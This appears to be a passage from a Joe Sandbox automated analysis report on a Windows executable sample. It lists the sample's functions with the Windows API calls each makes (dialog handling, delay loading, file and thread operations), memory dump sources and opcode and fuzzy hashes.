Instruction Fuzzy Hash: BEF0893104CB90AACB2357B449047C7BBD46F26331F058E4DF1FD5A196C27560989B23

Function 00350E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00350E3D

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 6adfd372f273fc86fd2571216df4d7eb95d9646be8283c500cd6a652dc5104ab
Instruction ID: be3e34f2b1b4dfafa06ab472cbe749aaeffe8d41c43588b9b62056b3ae1d798c
Opcode Fuzzy Hash: 6adfd372f273fc86fd2571216df4d7eb95d9646be8283c500cd6a652dc5104ab
Instruction Fuzzy Hash: 42D0C210A0115416DA2737286897BFE254E8FC7312F0E0065B8495F1A2DA450CCAA262

Function 0035A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0035A62C

Part of subcall function 0035A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0035A3DA

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 565735caf33db891165e31cbfd292e77decbab604e8dc7d899d373c054ef5840
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 0BD0C97121460DBADF476B618C12D6E7A99EB00346F048225BC42D91A1EAB1EA18B663

Function 0035DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00351B3E), ref: 0035DD92

Part of subcall function 0035B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035B579
Part of subcall function 0035B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035B58A
Part of subcall function 0035B568: IsDialogMessageW.USER32(00010466,?), ref: 0035B59E
Part of subcall function 0035B568: TranslateMessage.USER32(?), ref: 0035B5AC
Part of subcall function 0035B568: DispatchMessageW.USER32(?), ref: 0035B5B6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: b804efffce232ca1dd15e189fbce92b6646619e67c81b8b4956409eeab93f691
Instruction ID: 69aecc42ccb6ebb44c45e205ef6bb52d35318416b96feac3dd4c05e5dc60ffb2
Opcode Fuzzy Hash: b804efffce232ca1dd15e189fbce92b6646619e67c81b8b4956409eeab93f691
Instruction Fuzzy Hash: F5D09E32144300BAD6132B51CD06F1E7AA6AB89B05F404954B685740B1CB729D21DB11

Function 0035E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0035E5E3

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 68ffdffa9dd3efcc45624d134f87101214805e92e941466f19e65f9b7b53a542
Instruction ID: 2cdb144ef6e6ac528e13319d7b72ece151e168b3014aaafc5a8f33f859797cb3
Opcode Fuzzy Hash: 68ffdffa9dd3efcc45624d134f87101214805e92e941466f19e65f9b7b53a542
Instruction Fuzzy Hash: DFD0C9B01802509AD62FEBA89846F543258B32AB66F9005A1F949955F1EAA487888609

Function 003498BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,003497BE), ref: 003498C8

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 745fcbf70c27aac1f822c326690b0d8b62e9afbdf7b0923376cdeba08e1b746b
Instruction ID: 00cd9233a9317072d099360a5b9636d39379da9e993f4835c0bf96e82e1e4621
Opcode Fuzzy Hash: 745fcbf70c27aac1f822c326690b0d8b62e9afbdf7b0923376cdeba08e1b746b
Instruction Fuzzy Hash: 94C00235404209968E329A28984919A77A2AA533A6BB5979AD0698D0A1C322DC97EA11

Function 0035E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3dd73aa1b335663978131e9c1fb59b6350b312add5bfa5afb5d7ffe631653d67
Instruction ID: 14b2b1b650eed809ead7b46b67205d7616b54447c4c227552e1bb380ae1461b7
Opcode Fuzzy Hash: 3dd73aa1b335663978131e9c1fb59b6350b312add5bfa5afb5d7ffe631653d67
Instruction Fuzzy Hash: 89B012F9268000BC310FD1045C02C37020CC2C1F12330D02FFC29C5490D8484F480433

Function 0035E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 59df8f555c15df070f0e9d501258edd397ecc3d364a6d9940d765f42528d61fa
Instruction ID: d702fb67ee9b5127ea0fd9ad92c0ccac4c58f0dd1c001586c4f9542c9832c2b3
Opcode Fuzzy Hash: 59df8f555c15df070f0e9d501258edd397ecc3d364a6d9940d765f42528d61fa
Instruction Fuzzy Hash: CBB012E92A80007C310F91045D03C77030CC6C1F12330D02FFD29C5490D8440E4D0433

Function 0035E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea7e77ccdd9171c38009c5ea03593501f484a17691b0af7e40a7af426ec02cc7
Instruction ID: e8bd5968ff0118f472b991f8cd5b49b525215d53b492f8a6895d205ed071d181
Opcode Fuzzy Hash: ea7e77ccdd9171c38009c5ea03593501f484a17691b0af7e40a7af426ec02cc7
Instruction Fuzzy Hash: 91B012E9268000BC310FD1045C02C37030CC6C1F12330D02FFC29C5490D8444E4C0433

Function 0035E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55ec9be93ef681c877f6010c381b999f280a2f7f6e8671edff0cf77fd7da475e
Instruction ID: 1e794ca3860879a00de19ab043c5501d85c2fe8a7cfed40b51abb16dc3f50d71
Opcode Fuzzy Hash: 55ec9be93ef681c877f6010c381b999f280a2f7f6e8671edff0cf77fd7da475e
Instruction Fuzzy Hash: C3A001EA2A91567D311E6251AD46C7B021DC6C1F26334A52EFC39A98A1AD881A891872

Function 0035E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 307d49bcef5c0b474801bd2020e3578aa2ed3983a558db3b2b18dbd8959969fa
Instruction ID: 9a9f577ce76ab56b293d3bcdc9ecc25820e377f9d2c90ce9e2263196ab7093e2
Opcode Fuzzy Hash: 307d49bcef5c0b474801bd2020e3578aa2ed3983a558db3b2b18dbd8959969fa
Instruction Fuzzy Hash: F8A002E51691557C311E51515D46C77021DC5C5F52334951EFC2595491594419491472

Function 0035E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bf46ed094d748797b1749f5c7373d5e0c3ad5995761208875fa072a359a53bf0
Instruction ID: 9a9f577ce76ab56b293d3bcdc9ecc25820e377f9d2c90ce9e2263196ab7093e2
Opcode Fuzzy Hash: bf46ed094d748797b1749f5c7373d5e0c3ad5995761208875fa072a359a53bf0
Instruction Fuzzy Hash: F8A002E51691557C311E51515D46C77021DC5C5F52334951EFC2595491594419491472

Function 0035E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 907c671333ade701fbe74a8649a7c657b6baebdb07191f28a9154158c886a338
Instruction ID: 9a9f577ce76ab56b293d3bcdc9ecc25820e377f9d2c90ce9e2263196ab7093e2
Opcode Fuzzy Hash: 907c671333ade701fbe74a8649a7c657b6baebdb07191f28a9154158c886a338
Instruction Fuzzy Hash: F8A002E51691557C311E51515D46C77021DC5C5F52334951EFC2595491594419491472

Function 0035E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 129d007bcf11a850ac23430a3695bd3e79616d3c8b93b80cb06d7c90988fc0a1
Instruction ID: 9a9f577ce76ab56b293d3bcdc9ecc25820e377f9d2c90ce9e2263196ab7093e2
Opcode Fuzzy Hash: 129d007bcf11a850ac23430a3695bd3e79616d3c8b93b80cb06d7c90988fc0a1
Instruction Fuzzy Hash: F8A002E51691557C311E51515D46C77021DC5C5F52334951EFC2595491594419491472

Function 0035E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E3FC

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8fe4723fdbef1db92cb839a61d6ad45b074d2e403e35e6844709a821d616fc5d
Instruction ID: 9a9f577ce76ab56b293d3bcdc9ecc25820e377f9d2c90ce9e2263196ab7093e2
Opcode Fuzzy Hash: 8fe4723fdbef1db92cb839a61d6ad45b074d2e403e35e6844709a821d616fc5d
Instruction Fuzzy Hash: F8A002E51691557C311E51515D46C77021DC5C5F52334951EFC2595491594419491472

Function 00349F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0034903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00349F0C

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: d6c64fba004ee6df747594a4a5a6bd9333e4f6087f72e4b09154ad3932be59b5
Instruction ID: bf8f46cb8ae859822f9ae384ea3d08589511eb91343633b6be56b7a6472343ab
Opcode Fuzzy Hash: d6c64fba004ee6df747594a4a5a6bd9333e4f6087f72e4b09154ad3932be59b5
Instruction Fuzzy Hash: F5A0243004000D47CD111730CD0440C3710FF107C070001D4500FCF071C7134447D701

Function 0035AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0035AE72,C:\Users\user\Desktop,00000000,0038946A,00000006), ref: 0035AC08

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 83a4a0c95a590dad1b9d6579950766508c8d9c3002838ecca1528a09524e2d7d
Instruction ID: 1b524fdc2511630a9e7369c8b82682cc607cbd6233edec5a51789b201c87e998
Opcode Fuzzy Hash: 83a4a0c95a590dad1b9d6579950766508c8d9c3002838ecca1528a09524e2d7d
Instruction Fuzzy Hash: A8A011302002008B82022B328F0AA0EBBAAAFA2B00F00C028A08880030CB30C8A0FA02

Function 00349620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,003495D6,?,?,?,?,?,00372641,000000FF), ref: 0034963B

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 76f0d2e764e2362e632c78fe79cbaa616e0ab8d94cfb1c7a98839a44f5945d4e
Instruction ID: 46de677b71b9f36e5da3f725911d249f549d9b068a3d87ae1cce7ad4393403c8
Opcode Fuzzy Hash: 76f0d2e764e2362e632c78fe79cbaa616e0ab8d94cfb1c7a98839a44f5945d4e
Instruction Fuzzy Hash: 43F08270481B159FDB328E24C858B93B7E8AB12331F065B1FD0E74A9F0D765798D9B40

Non-executed Functions

Function 0035C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00341316: GetDlgItem.USER32(00000000,00003021), ref: 0034135A
Part of subcall function 00341316: SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0035C2B1
EndDialog.USER32(?,00000006), ref: 0035C2C4
GetDlgItem.USER32(?,0000006C), ref: 0035C2E0
SetFocus.USER32(00000000), ref: 0035C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0035C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0035C358
FindFirstFileW.KERNEL32(?,?), ref: 0035C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0035C38C
